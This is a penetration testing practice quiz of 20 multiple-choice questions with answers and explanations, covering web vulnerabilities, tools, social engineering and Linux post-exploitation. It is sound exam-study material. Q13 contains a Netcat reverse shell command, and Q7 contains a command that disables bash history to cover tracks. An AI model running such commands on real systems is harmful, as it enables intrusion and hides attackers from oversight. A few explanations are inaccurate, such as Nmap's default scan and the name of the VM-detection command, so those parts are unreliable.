Penetration Testing Quiz - 20 Questions to Test Your Skills and Learn

Test and expand your knowledge of penetration testing with these 20 thought-provoking MCQs. Designed for learners of all levels, this set includes answers and in-depth explanations to ensure you not only answer correctly but also understand the ‘why’ behind each solution.

1. Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?

A. SQL injection
B. VM escape
C. Buffer overflow
D. Cross-site scripting

Correct Answer – B.

Explanation – Web applications commonly experience SQL injection, buffer overflow, and cross-site scripting vulnerabilities. Virtual machine (VM) escape attacks work against the hypervisor of a virtualization platform and are not generally exploitable over the Web.

2. What specialized type of legal document is often used to protect the confidentiality of data and other information that penetration testers may encounter?

A. An SOW
B. An NDA
C. An MSA
D. A noncompete

Correct Answer – B.

Explanation – A nondisclosure agreement, or NDA, is a legal agreement that is designed to protect the confidentiality of the client’s data and other information that the penetration tester may encounter during the test. An SOW is a statement of work, which defines what will be done during an engagement, an MSA is a master services agreement that sets the overall terms between two organizations (which then use SOWs to describe the actual work), and noncompetes are just that—an agreement that prevents competition, usually by preventing an employee from working for a competitor for a period of time after their current job ends.

3. Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?

A. ZAP
B. Nessus
C. SonarQube
D. OLLYDBG

Correct Answer – A.

Explanation – The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing.

4. Matt is part of a penetration testing team and is using a standard toolkit developed by his team. He is executing a password cracking script named password.sh. What language is this script most likely written in?

A. PowerShell
B. Bash
C. Ruby
D. Python

Correct Answer – B.

Explanation – The .sh file extension is commonly used for Bash scripts. PowerShell scripts usually have a .ps1 extension. Ruby scripts use the .rb extension, and Python scripts end with .py.

5. Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?

A. Record the details in the penetration testing report.
B. Remediate the vulnerability that allowed her to gain access.
C. Report the potential compromise to the client.
D. No further action is necessary because Renee’s scope of work is limited to penetration testing.

Correct Answer – C.

Explanation – When penetration testers discover indicators of an ongoing or past compromise, they should immediately inform management and recommend that the organization activate its cybersecurity incident response process.

6. Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?

A. Black box
B. Authenticated
C. Internal view
D. External view

Correct Answer – B.

Explanation – An authenticated, or credentialed, scan provides the most detailed view of the system. Black box assessments presume no knowledge of a system and would not have credentials or an agent to work with on the system. Internal views typically provide more detail than external views, but neither provides the same level of detail that credentials can allow.

7. Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently prevent the commands she inputs to a Bash shell, which of the following commands should she use?

A. history -c
B. kill -9 $$
C. echo “” > /~/.bash_history
D. ln /dev/null ~/.bash_history -sf

Correct Answer – D.

Explanation – While all of these commands are useful for covering her tracks, only linking /dev/null to .bash_history will prevent the Bash history file from containing anything.

8. Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?

A. Nmap
B. Nikto
C. Wireshark
D. CeWL

Correct Answer – B.

Explanation – It’s very important to know the use and purpose of various penetration testing tools when taking the PenTest+ exam. Nikto is the best tool to meet Kaiden’s needs in this scenario, as it is a dedicated web application scanning tool. Nmap is a port scanner, while Wireshark is a packet analysis tool. The Custom Wordlist Generator (CeWL) is used to spider websites for keywords. None of the latter three tools perform web application security testing.

9. Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?

A. OSINT
B. HSI
C. Background
D. None of the above

Correct Answer – A.

Explanation – OSINT, or open-source intelligence, is information that can be gathered passively. Passive information gathering is useful because it is not typically visible to targets and can provide useful information about systems, networks, and details that guide the active portion of a penetration test.

10. Which of the following activities constitutes a violation of integrity?

A. Systems were taken offline, resulting in a loss of business income.
B. Sensitive or proprietary information was changed or deleted.
C. Protected information was accessed or exfiltrated.
D. Sensitive personally identifiable information was accessed or exfiltrated.

Correct Answer – B.

Explanation – Integrity breaches involve data being modified or deleted. When systems are taken offline it is an availability issue, protected information being accessed might be classified as a breach of proprietary information, and sensitive personally identifiable information access would typically be classified as a privacy breach.

11. Ted wants to scan a remote system using Nmap and uses the following command:
nmap 149.89.80.0/24
How many TCP ports will he scan?

A. 256
B. 1,000
C. 1,024
D. 65,535

Correct Answer – B.

Explanation – By default, Nmap will scan the 1,000 most common ports for both TCP and UDP.

12. Brian is conducting a thorough technical review of his organization’s web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?

A. Penetration testing
B. Vulnerability scanning
C. Remediation
D. Threat hunting

Correct Answer – D.

Explanation – Threat hunting uses the attacker mindset to search the organization’s technology infrastructure for the artifacts of a successful attack. Threat hunters ask themselves what a hacker might do and what type of evidence they might leave behind and then go in search of that evidence. Brian’s activity clearly fits this definition.

13. Liam executes the following command on a compromised system:
nc 10.1.10.1 7337 -e /bin/sh
What has he done?

A. Started a reverse shell using Netcat
B. Captured traffic on the Ethernet port to the console via Netcat
C. Set up a bind shell using Netcat
D. None of the above

Correct Answer – A.

Explanation – Liam has used Netcat to set up a reverse shell. This will connect to 10.1.10.1 on port 7337 and connect it to a Bash shell.

14. Dan is attempting to use VLAN hopping to send traffic to VLANs other than the one he is on. What technique does the following diagram show?

VLAN hopping attack

A. A double jump
B. A powerhop
C. Double tagging
D. VLAN squeezing

Correct Answer – C.

Explanation – This is an example of a double tagging attack used against 802.1q interfaces. The first tag will be stripped, allowing the second tag to be read as the VLAN tag for the packet. Double jumps may help video gamers, but the other two answers were made up for this question.

15. Alaina wants to conduct a man-in-the-middle attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?

A. ARP spoofing
B. IP proofing
C. DHCP pirating
D. Spoofmastering

Correct Answer – A.

Explanation – ARP spoofing attacks rely on responding to a system’s ARP queries faster than the actual target can, thus allowing the attacker to provide false information. Once accepted, the attacker’s system can then act as a man in the middle.

16. Michael’s social engineering attack relies on telling the staff members he contacts that others have provided the information that he is requesting. What motivation technique is he using?

A. Authority
B. Scarcity
C. Likeness
D. Social proof

Correct Answer – D.

Explanation – Social engineering attacks that rely on social proof rely on persuading the target that other people have behaved similarly. Likeness may sound similar, but it relies on building trust and then persuading the target that they have things in common with the penetration tester.

17. Vincent wants to gain access to workstations at his target but cannot find a way into the building. What technique can he use to do this if he is also unable to gain access remotely or on site via the network?

A. Shoulder surfing
B. Kerberoasting
C. USB key drop
D. Quid pro quo

Correct Answer – C.

Explanation – A USB key drop is a form of physical honeypot that can be used to tempt employees at a target organization into picking up and accessing USB drives that are distributed to places they are likely to be found. Typically one or more files will be placed on the drive that are tempting but conceal penetration testing tools that will install Trojans or remote access tools once accessed.

18. Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered?
-rwsr-xr—1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture

A. An encrypted file
B. A hashed file
C. A SUID file
D. A SIP file

Correct Answer – C.

Explanation – The s in the file attributes indicates that this is a SETUID or SUID file that allows it to run as its owner.

19. Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise?

A. Nmap
B. Traceroute
C. regmon
D. Whois

Correct Answer – D.

Explanation – Regional Internet registries like ARIN are best queried either via their websites or using tools like Whois. Nmap is a useful port scanning utility, traceroute is used for testing the path packets take to a remote system, and regmon is an outdated Windows Registry tool that has been supplanted by Process Monitor.

20. Chris believes that the Linux system he has compromised is a virtual machine. Which of the following techniques will not provide useful hints about whether the system is a VM or not?

A. Run system-detect-virt
B. Run ls -l /dev/disk/by-id
C. Run wmic baseboard to get manufacturer, product
D. Run dmidecode to retrieve hardware information

Correct Answer – C.

Explanation – All of these commands are useful ways to determine if a system is virtualized, but wmic is a Windows tool.

You may also like: